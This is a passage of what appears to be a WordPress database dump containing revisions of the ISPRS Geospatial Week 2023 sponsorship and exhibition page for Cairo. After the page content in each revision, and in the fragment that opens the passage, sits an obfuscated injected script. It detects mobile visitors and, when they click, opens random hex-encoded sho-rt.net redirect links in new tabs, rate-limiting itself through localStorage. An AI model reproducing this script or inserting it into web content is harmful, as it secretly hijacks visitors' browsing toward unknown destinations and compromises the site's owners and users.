_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2022-10-26 16:00:45','2022-10-26 16:00:45','',2920,'https://gsw2023.com/?p=2941',0,'revision','',0),
(2942,1,'2022-10-26 16:01:29','2022-10-26 16:01:29','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</h5>\n<h5></h5>\n<h5>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</h5>\n<h5>of dedicated workshops. More information regarding ISPRS can be found at:</h5>\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\n<h5></h5>\n<h5>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</h5>\n<h5></h5>\n<h5>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</h5>\n<h5></h5>\n<h5>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</h5>\n<h5></h5>\n<h5>The GSW2023 Organizing Committee.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></h4>\n<p><strong>Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El- Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u> .</strong>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2930\" img_size=\"1600x2000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h5><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></h5>\n<p>(<u>https:/<a href=\"http://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc\">/www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc</a>=nav_hotel</u> <u>detail_undefined</u>)</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2936\" img_size=\"1000x500\" alignment=\"center\" onclick=\"zoom\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\n<p><strong>Upon registration, the sponsor’s logo and level of support will be published on the GSW2023 website.</strong></p>\n<p>&nbsp;</p>\n<ul>\n<li><strong>March 1, 2023 Deadline for sponsorship confirmation and payment</strong></li>\n<li><strong>June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</strong></li>\n</ul>\n<p>&nbsp;</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport</h5>\n<p><strong>Abouquir,Alexandria - Main Campus</strong></p>\n<p><strong>P.O. Box 1029 -Gamal Abdelnaser st. (+203) 22685616</strong></p>\n<p><b>Fax:(+203)  </b></p>\n<p>&nbsp;[/vc_column_text][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][ultimate_info_table design_style=\"design04\" color_scheme=\"blue\" package_heading=\"CONFERENCE PROGRAM FOR EXHIBITORS\"]</p>\n<table>\n<tbody>\n<tr>\n<td width=\"170\">\n<h5><strong>September 2</strong></h5>\n</td>\n<td width=\"189\">\n<h5><strong>9:00 – 5:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5><strong>Tutorial Day</strong></h5>\n<h5><strong>Exhibition Setup</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 3</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>12:00-17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition Opening</strong></h5>\n<h5><strong>Welcome Reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 4</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Exhibitors’ reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 5</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 15:00</strong></h5>\n<h5><strong>15:00 – 18:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Dismantle Exhibition</strong></h5>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>The Organizing Committee reserves the right to change these times to better fit the final program if necessary. Allocation of the booths will be on a first-come-first-served basis upon receiving the confirmation and payment, with preference given to the companies who request multiple booths</strong></h5>\n<p>&nbsp;</p>\n<h5><strong>INFORMATION</strong></h5>\n<p><strong>For more information visit the Geospatial Week 2023 website: www.gsw2023.com or contact<a href=\"mailto:elsheimy@ucalgary.ca\"> the organizing committee by mail (elsheimy@ucalgary.ca</a> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u></strong> ).[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2022-10-26 16:01:29','2022-10-26 16:01:29','',2920,'https://gsw2023.com/?p=2942',0,'revision','',0),
(2943,1,'2022-10-26 16:17:02','2022-10-26 16:17:02','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</h5>\n<h5></h5>\n<h5>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</h5>\n<h5>of dedicated workshops. More information regarding ISPRS can be found at:</h5>\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\n<h5></h5>\n<h5>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</h5>\n<h5></h5>\n<h5>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</h5>\n<h5></h5>\n<h5>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</h5>\n<h5></h5>\n<h5>The GSW2023 Organizing Committee.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></h4>\n<p><strong>Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El- Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u> .</strong>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2930\" img_size=\"1600x2000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h5><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></h5>\n<p>(<u>https:/<a href=\"http://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc\">/www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc</a>=nav_hotel</u> <u>detail_undefined</u>)</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2936\" img_size=\"1000x500\" alignment=\"center\" onclick=\"zoom\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\n<p><strong>Upon registration, the sponsor’s logo and level of support will be published on the GSW2023 website.</strong></p>\n<p>&nbsp;</p>\n<ul>\n<li><strong>March 1, 2023 Deadline for sponsorship confirmation and payment</strong></li>\n<li><strong>June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</strong></li>\n</ul>\n<p>&nbsp;</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport</h5>\n<p>&nbsp;</p>\n<p><strong>Main Campus</strong></p>\n<p><strong> Alexandria, </strong><strong>Miami </strong><strong>Campus</strong></p>\n<p><strong>P.O. Box 1029 -Gamal Abdelnaser st. </strong><strong>-Miami </strong></p>\n<p><strong>Tel :(+203) 5565429/ 5506042</strong></p>\n<p><b>Fax:(+203) 5487786/ 5506042  </b></p>\n<p>&nbsp;</p>\n<p><strong>Alexandria, </strong><strong>Abu kir Campus</strong></p>\n<p><strong>Tel :(+203) 5622366/ 5622388</strong></p>\n<p><b>Fax:(+203) 5610950</b>[/vc_column_text][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][ultimate_info_table design_style=\"design04\" color_scheme=\"blue\" package_heading=\"CONFERENCE PROGRAM FOR EXHIBITORS\"]</p>\n<table>\n<tbody>\n<tr>\n<td width=\"170\">\n<h5><strong>September 2</strong></h5>\n</td>\n<td width=\"189\">\n<h5><strong>9:00 – 5:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5><strong>Tutorial Day</strong></h5>\n<h5><strong>Exhibition Setup</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 3</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>12:00-17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition Opening</strong></h5>\n<h5><strong>Welcome Reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td 